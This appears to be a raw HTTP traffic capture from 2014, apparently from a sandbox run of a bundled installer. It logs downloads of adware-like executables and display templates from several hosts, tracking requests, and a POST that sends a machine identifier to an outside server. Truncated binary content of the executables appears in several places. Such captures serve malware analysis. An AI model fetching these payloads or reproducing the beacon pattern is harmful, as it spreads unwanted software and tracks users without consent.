................U..j....W..!...]................U..Q3..E...]....U..Q3.
.E...]....U..hp.B.h..B.h....j.h..W......h..U..xj.....]....U..h..W...aX
......h..U..Tj.....]................U..h. X...aX......h..U..$j.....]..
..............U..h..X..paX..n...h..U...i.....]................U..h
<<< skipped >>>


GET /test.html HTTP/1.1
Host: api.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 21 Oct 2014 02:31:57 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...



GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<og7x..dx
..dx..d>_.dd..dqv.dy..d>_.d)..d>_.d...dqv.du..dx..d...du\.dq.
.du\.dy..du\.dy..dRichx..d........PE..L.....;T.................r...j..
[email protected]............@...........
..........................d....p..........................\...........
............................@.........................................
...text....p.......r.................. ..`.rdata..X............v......
........@[email protected][email protected]
[email protected]......................@[email protected]..
\[email protected]......................................
......................................................................
......................................................................
......................................................................
........................................................U..Q3..E...]..
..U.....V..c...]..U..Q3..E...]....U.....W......h..U...k.....].....U...
..W......h..U..ik.....].....U.....W......h..U..Ik.....].....U..j....W.
.....]................U..j....W..a...]................U..j....W..A...]
................U..j....W..!...]................U..Q3..E...]....U..Q3.
.E...]....U..hp.B.h..B.h....j.h..W......h..U..xj.....]....U..h..W...aX
......h..U..Tj.....]................U..h. X...aX......h..U..$j.....]..
..............U..h..X..paX..n...h..U...i.....]................U..h
<<< skipped >>>


GET //Styles/Softwares/844a2c3b_browserapp.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 734
Last-Modified: Tue, 01 Jul 2014 09:26:57 GMT
Connection: close
ETag: "53b27ee1-2de"
Accept-Ranges: bytes
PK........YE.D...=....=.......browserapp.css.S.N.1.='R.aJ......j.\@TH\
z.U........l.."...I..JI.:....y...}U..:.p...- Nf....n....U......q...ki.
(-u..0.>V}8..A.....w_......\'GF.H....?.4.:..e..}?.X.Y....E..._L..&g
t;..!..... .......C...R(,/...o.Hx.p.B....s.. ..0KY.=s.'...m...o..8}..F
d.$....b...... b....Y>..<&...%...Jjd....p...XQK.g... ...F.......
fp.E..7S>b......"..>.it.W......k..4.E....,).<...H.dk....p.d..
...^..'....=.U.v3Q5L......6B...//l.....^........R..t^...fp<I.!....E
b...G............#`/.../PK.........k3C................images/PK.......
...YE.D...=....=.....$....... .......browserapp.css.. ................
.\.5.....\.5.....PK...........k3C..............$...............images/
.. .........x..,3.....7.......7.....PK......................



GET /test.html HTTP/1.1
Host: track.v2.sslsecure1.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:53 GMT
Server: Apache
Set-Cookie: vsid=913vr1614043135600456; expires=Sun, 20-Oct-2019 02:31:53 GMT; path=/; domain=track.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET //Displays/Templates/8b4083bc_Win-Y-Yahoo.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 7483
Last-Modified: Mon, 03 Mar 2014 12:57:44 GMT
Connection: close
ETag: "53147c48-1d3b"
Accept-Ranges: bytes
PK........(gcD#.R.............box.html.Vmo.6......W.[....d.....:...M.V
Y.O.%....TI*.W.'.?.(....E3./..w..;........1...0.~..r.$..........~..y.G
.3..SV8..............|..OBmf4~G.^..gn...p..........E!..v.9:==m....e...
8>.Wq<...^_....a........WqD..R...f .c....s%."2..q..xYr.i......ze
}Hsf,w..:x...ipD.zYN8....:&Y..d.........r....C.ZK.fy......X.....;....Z
..^..x?zw9.........%2Y..=. .H..K&......;j..f.`.'K.....e......>..Hm.
X..&z..H..].`9.Zq.....-.B1.Oh....RO..X.%S._....R3w&...7...\~..._[....]
...6..|..p..1W.#..0X.\k....DgK...d..tZ...p..Xr.|......T..........>.
ZYD..Xm.2>e.t}R.......T2................6{ .{..d8...X.}.y...I...t..
.....4...fR%.M.m.........p.....h.e..x[..U.kl..vl.B...s1.....r._....6..
9.1..R!7.d........DK........;...!.([cNL...[.]I......s...rE[.7.........
..\[....=.P4.....z..6...NP_..c.}..e.e.e.OD...i-..$O.4zfX.4...$^....em.
".x.;.2...TUtSn'4.....f5..............[.I....TRW.....c_./.?Mj{..%..-TY
9h..H.....8'Be|..gk?....fj.....u.t....wLV...........J1.o#".p0G.z...np&
lt;.~."......|.. .[S[..).eB.....Y"9..LZ~....!./f..d....y...a[A&.[3..E.
.n.n..?8)..X........l..o.k..ca..c/..h.Hj....6...%.......[.zi.QG.1..y..
*...c.E ....-...n..bgDN...G..V.p.....C..|O.j:v..i.l} P..Q*...3.c..2j..
.5(W.,...ly.0.........eU...2?.D.......%.....e=.....8.k<..l ..yE.. .
.....n...PK.........F.C.2..............close.html]PAN.0.</..09p }.f
.x.G.M.."8U.".=N.E .....L2>.....'..4d.:..p..v...E.n0 .a...^2D.....u
>[email protected][ryK....].c...)...E.f.F.K.#[email protected].......
.x-KN.S...A.....G.....f.....U.3M...77.~.....fB........Eiw..9t.....
<<< skipped >>>


GET /test.html HTTP/1.1
Host: api.v2.sslsecure1.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:56 GMT
Server: Apache
Set-Cookie: vsid=920vr1614043162210446; expires=Sun, 20-Oct-2019 02:31:56 GMT; path=/; domain=api.v2.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET /download/wajam_download.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: VVV.wajam-download.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:14 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 21 May 2014 20:10:51 GMT
ETag: "7015d-f0c0-4f9ee97ca68c0"
Accept-Ranges: bytes
Content-Length: 61632
Connection: close
Content-Type: application/x-msdos-program
Set-Cookie: APPSESSID=w2|VEXFs|VEXFs; path=/
Cache-control: private
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^.
.K.................b...........6............@.........................
.........`............................................................
..P...p...............................................................
.............................text....a.......b.................. ..`.r
data...............f..............@[email protected]..........
[email protected].................
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
[email protected]...`[email protected]
....E..9}[email protected].}[email protected]..
[email protected][email protected] ...Pj.h.[[email protected].@._^3.
[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET //Displays/Softwares/1f76ab55_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Thu, 17 Jul 2014 09:13:47 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
28a3...............r.......i..-E.Two;foI....$. ..@....;[email protected].......
y.....7.'...2..p.Zrx..8l.(de.:........p...A.Mg..;..........k....~.Z_..
.G........iYeE.......OK?l...<..?.M.|.dyZ.d.......aoQT.......4_..C.s
2?Xr.....~.;.......{.M..[f.Yz.wt..&.<u..-..?......j..aQ..f..O.j....
..........j....'.......lzQ...Z.......Z[....E...-f..A.:..&e.....e......
.....\eXV..[O...d6.........7.....Sw...M.t7e1wq.Y.L ...rU.....b.._6.]Ri
...MZ..~!J....j..3i.........d.r..,_=d.......?....,.....O.[.g.....A....
..n....M..*.{.......J.X<.~q..].2E..4..c....>........5*..........
.*.).l6......../.d...j.....m2I.....p..-.i.e.%l.wEq;K.......}V.......kC
0.^................>:.M....A[..N4V..K.6.J.rrw.n.'.....d:=(.}7 &P.(.
O..n:....Dfi.....tf:...TT.t.4A....}O'.H.z...vq.....oL...m.).@7..?O....
.D..Of.i...=B.4_j.4....%$.d.'.I.........FI=.bMK..o.l.....-.tv.E..V.7..
.DU..%.e.gl...R.vy.}......b.vW.e.....r..^.(/.y.....:...2....u.........
r.........).!:..&...[b;.......%....>..M.^.H..__........[..m1$...Y.\
.=.^,....V._.p[&sd=K.........C.P...<.f..%..).[....TzP.y6.J..E..x...
...W2....@...?..L....6c^0O...Y.d...oy.....u.<...#...Kin..G...xx1...
.....#.#.....,....."|;[email protected]..).....Z..U.m..<z.......Y..R.E....
*z..[6s..g.....#.mB.eI>..\/...T'Co...m.%&.Fc.@D2.. ..:.e.q.0. ....B
Qc.......u.h.............R..R..62M......u..........~...b. .?..(<.\.
..g.(p.9N.;..Yq......bu ...f`$DV.d.-..Y.......*U1[.l..g.y1...W.|'.a..E
...&A......A.t..?}....hy.Op..e.......v..b.(20..*.N'.............<.&
...I*k...B...).....U.\.dBa..v../...B...q#....T.....Q.&. .@R..#....
<<< skipped >>>


GET //Styles/Softwares/7a6c4a7c_genesis.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: application/zip
Content-Length: 712
Last-Modified: Tue, 25 Mar 2014 18:45:40 GMT
Connection: close
ETag: "5331ced4-2c8"
Accept-Ranges: bytes
PK........3|yD................genesis.css.RAO*1.>C...'[email protected]..
...ew.m,.......m...=#.8....7.|.u~....=...^.............x\............B
.N:..?8:.N.Gt....F......d......,|.v......i..&m,FHk%5.QV....../.2d..~..
b.dO..f..O..Ba..|.....5.M{.V.....,.f..g8E...gN. ...fO.../I;.$.....&..-
B.9.2Rdy7...(.3J<s........C.XQJ.g..r .R..\.29jDYJ]......Q!.l]8.....
..E.....^.^......K..4.E... ,)...^.Hh.%Z.q..)YB."E.*zB..X.g...8I....ck.
.I:/...q....L........00.{.LPX..{....^?......==JW*.,k.kh..PK........Fv2
C................images/PK..........3|yD..............$....... .......
genesis.css.. .........*Tt.?H..c..h<H..c..h<H..PK..........Fv2C.
.............$...............images/.. ..........O.`~...c..h<H..c..
h<H..PK......................



GET /debug/Version/4_0_6_30/Nsis/GetParameters HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:37 GMT
Server: Apache
Set-Cookie: vsid=910vr1614042971716942; expires=Sun, 20-Oct-2019 02:31:37 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'" 
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i1.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i3.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
 130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i2.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff; 
font-weight:bold; line-height:40px; text-transform:capitalize}...c
<<< skipped >>>


GET /ba/shop/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807295"
Last-Modified: Mon, 20 Oct 2014 12:14:55 GMT
Cache-Control: max-age=2593
Content-Length: 11416440
Content-Type: application/x-msdownload
X-HW: 1413858735.dop006.ny2.t,1413858735.cds051.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
................ ..............................p......................
.!....................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.conduit-data.com
Content-Length: 225
Connection: Keep-Alive
Cache-Control: no-cache

{"event_type":"SPidentifier", "environment":"",  "machine_ID":"IGLPAZZPZGFIMOT1B RJNV1K7TMDFU BMNXXJDZJK NF/RB AB/BYPPEZXOET4OC8Q82QKOOJII3O1IEAOTPCW", "result": "success", "failure_reason": "clean_machine", "SP_version": ""}
HTTP/1.1 202 Accepted
Date: Tue, 21 Oct 2014 02:32:12 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive



GET /index.php/api/85/Java/195/286/English.xml HTTP/1.1
Accept-Encoding: gzip, deflate,gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: api.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip
Content-Type: text/xml; charset=utf-8
Date: Tue, 21 Oct 2014 02:32:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx
Set-Cookie: symfony=64vhocqbj62rhnuh3dne4v9qg6; path=/
transfer-encoding: chunked
Connection: Close
370f..............{o.H...w7..A........"g.Y..$..co.N.g.0h.ls-.......{..
..K..%.J......,.*..n<...w...v..cQ.../....?5X0..~p...&.....?....O...
...h4.........S.]..............V.T..uGut.e...?...]s...0.'.G4M.tUwU.e..
.......TU35W.[.....)...o.............6....s..n.FM...\fm..6..-}......4.
.4..:.k...2.<.=..5[..../.....k.n.ql.j..4!.RU3,G5t]...2{Z5]C7U..M.2.
...............& .....ib......E.g..:I..i6..K.A....%K...}0...^...T.....
..A...N.=..e.gw..,..D....,......^......F~|....TX.~)"a..............y:.
.7..Su....7?P~W~...p...<.N....=...._q.0bq....o.e..j..[.\....e/>.
.7....=.....|........{.u&!-......!6b.;...0{f...,..NF.?..... .s...b....
....{....O.._>z....k.|.x...TW... ..i.v.(.......rs.P.&...\.jQWn..(..
.....d2.J.i..W.Lf...... ..o.0fW..j...<..0J.P\. pv....6\.....:o..l..
U.....(.....9.'Y.#.s...(..{....$..r...R,...#....i.....~/.........$n...
7j.#...<.....{..|...ec(o....k....:Tx......Y..F&9ac..k>...gsk.'.w
C/.............L...,....X>.=.m.3...S>.^.X.?m...(.......M}6......
a8e..Zk..Cbot.....1}.(...g...... Jsg..7g..b.....m%...tZ.~.....4.._.?.~
.D..$......:...]0.}..1.......{.=.>....6'.q.z.h..h.L... .,.mnR.f....
;M....m..."...8..i....../m..#..f5...{.]sv..r.....?......K?.....k|vm./.
r.y:D/.}......Ko........%h.....}(K.1../..t.LK.re=....'k.o..T...o..'..,
......x.._.<...... ...e......u'.er.E|.5.#......$..|....2..I./?..j..
.f...........1....N)..1....r....>V......f2.2&..)M.j..,\..'.. .X?H.E
|..Z.2.F.GA.]z|........'...v.g:....u..t. ...........2:..H....v>f...
o...i..Ls.~o4W.._l..........`.m1...i{/..a...e..s6.j.<0J..~[5...
<<< skipped >>>


GET //spidentifier/1.0.2.0/spidentifierimpl.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: sp-storage.spccinta.com
Connection: Close


HTTP/1.1 200 OK
Last-Modified: Tue, 21 Oct 2014 05:32:08 GMT
Accept-Ranges: bytes
ETag: "a598e211a86915fe8941be6e4d135f8b"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 2592168
Date: Tue, 21 Oct 2014 02:32:08 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
.....................'...@.................................@..........
.0............t'. ....`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
...............@....ndata...................................rsrc...0..
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


GET /ba/shop/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807295"
Last-Modified: Mon, 20 Oct 2014 12:14:55 GMT
Cache-Control: max-age=2593
Content-Length: 11416440
Content-Type: application/x-msdownload
X-HW: 1413858735.dop006.ny2.t,1413858735.cds051.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
................ ..............................p......................
.!....................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET //Displays/Softwares/6fe4b061_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Tue, 25 Mar 2014 18:46:17 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
1674...............r.Wr...*....6...R.dg..Y.............fH...`g... ..:W
.J^ ..}.?I~_.3.P.l_D..E.....u..}.O...t.~.{...N.]...>r..^4...k6..>
;9....p....U..>M.[.....G.|...UZ4....-....h...&.W...:]m..&].eV6w.b..
O.:.......M.Y.....t1.....n3O.q5-..:-..*....".s........NO........]e....
.d.5.;...O...._....N.Ez.6_,..vrHY..4].lUn..L....n.. .S.e.....O....f...
.M..9..v.K.x..)...6.....Zl.o....x.-..i.v......<.%`~}....':)..}V . i
~}....5.(.M.2_.w.'^}... .q.qe.HM.:.-Zj.J.......%r...`.)g..&.....Y...R.
V.G."OP...........K.Z...4(..xv..."...0..OYZ...7.....s........0.3..ccf.
t.....V..IE.d..&...P...n..6q..Y..C.>.F.Z]...;...k.{..1.6r..n2..c.&g
t;..q..;.j.#M}y...../[.....gc......p.7......qk....Q.;...nt.=~...$..dWp
.:...........~.....7.L.-.u.p/......._......,]...=.....,...x.y...M.....
.`...O.R.......az..kwBE;_....../..../.}.m.....}...r..t.._}...o^5\....O
....\'A..:.y.....Tp....w/^.x...'..".V..&-../Db.;\.sOSW..K..._<[email protected]
..q..O.>F.....Q4....Um,Bf5...n0.FQ.;D......6..#...B.v.Z..Qt......Z.
C....G..(.......kVv..G...k.e...s.._.Z..,/!.u-{T...............B.....~~
..?:@.....Hlu.F.m........&t.....|v.....n......jv..{....h..v......_=o.1
......9.....LF..nxmI.$:f#..(#i....j......w.D3...qC.vx.M0..1...om.....[
U[K...y`xN%.H5....-..E..|2..9.........6d..TS ..x_..w.V.....,....b..f.(
...........#....lu...e.=(x..)...8.V...'B...P......K| ..h.eZ8.z..)..q..
..r.(........ ...V.;"...-......d.,_ ....K.....q.e.)u.x...Q`(../.....-.
..}..n..V9a......e.....X..G.*l0Zs.........O^.e.d..... $../H...$......\
.b3B0..b...e8..l.l.e.Jjo....x Y..).... ..4...bs...4]x.q.KC......@.
<<< skipped >>>


GET //Styles/Softwares/82fb03ea_binghp4.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:21 GMT
Content-Type: application/zip
Content-Length: 740
Last-Modified: Tue, 24 Jun 2014 10:05:59 GMT
Connection: close
ETag: "53a94d87-2e4"
Accept-Ranges: bytes
PK........3oDC................images/PK...........Dx...............bin
ghp4.css.SMo.0.=.....`..Jb.c.|...@/.tC....B.Q...]..>Kv..C.t4`....{$
....m......l}.%.t.W......-j.......&4P|.......=.I._.<...8.L...p...&.
H.....L.^..K.OQ..9.7..).....FY...S....5d....Y..........x.PX....NN.....
..c_.VR.t...../M.....5.7.45.....'I7lCv....e ..".g.a....j...J..%...Jjd.
...]J.1..Bd..>.-*...=........#........;|.F..#..6.>.......t.:....
....h.v.h.w.....L..2..u...m=l..xxK/......,=...&.`..p.......].....h9.}k
H..FW!..H*{...c.(.N..#..nhg.{...jx0.C......b.=Jg=..R.U."..PK..........
3oDC..............$...............images/.. ............M......l@.....
[email protected].............$....... ...%...binghp4.css.. ...
........ [email protected]@....PK......................



GET //Styles/Softwares/9c04a3ed_thebestdeals.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 750
Last-Modified: Thu, 09 Jan 2014 10:45:27 GMT
Connection: close
ETag: "52ce7dc7-2ee"
Accept-Ranges: bytes
PK.........S)D6.lz............thebestdeals.css..QO.0....)..F.....F.:/c
P.I.^.i.NrM,....-C.........v..........u..E.G...drT......s.R.m....(.{[.
55J,>.>.......9.....I...p.....n...."z.9.D.......B..d.....0H....i
...&..K.!o;G....w...8&].f.z3.~.;._#*.....r]... ...N'.....Kz...!.O?...J
:b...E...he.g-J..Q..V.vO..x@:dJ;..%Ke.][email protected](C.......Rp.....y..a
.W`5...|,.b..\..h.4\.4.b..4`..G;wK.W...1.,..\.X...7.Q..........[.%Dtfx
.#[email protected].{...}[email protected]..!...l.xz.p....t.i.p.:...^......x..
..A..>w._;..X|.-....PK.........^.B................images/PK........
...S)D6.lz..........$....... .......thebestdeals.css.. ...........0.%.
....Ts%.....Ts%...PK...........^.B..............$...............images
/.. ............A.V....Ts%.....Ts%...PK......................



GET /test.html HTTP/1.1
Host: track.v2.sslsecure3.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:54 GMT
Server: Apache
Set-Cookie: vsid=925vr1614043140610643; expires=Sun, 20-Oct-2019 02:31:54 GMT; path=/; domain=track.v2.sslsecure3.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: JByyQUSVkCbGCtzdBEnuaFPXWbPoUMgQf3riPBCD4yxs1v6AwnDMiNazHeOz8wKA
x-amz-request-id: A5AADF8B1BCB6C69
Date: Tue, 21 Oct 2014 02:32:16 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
........................|........................................t....
......0m..............p...............................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
..0m.......n...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: download.uniblue.com
Connection: Close


HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/plain
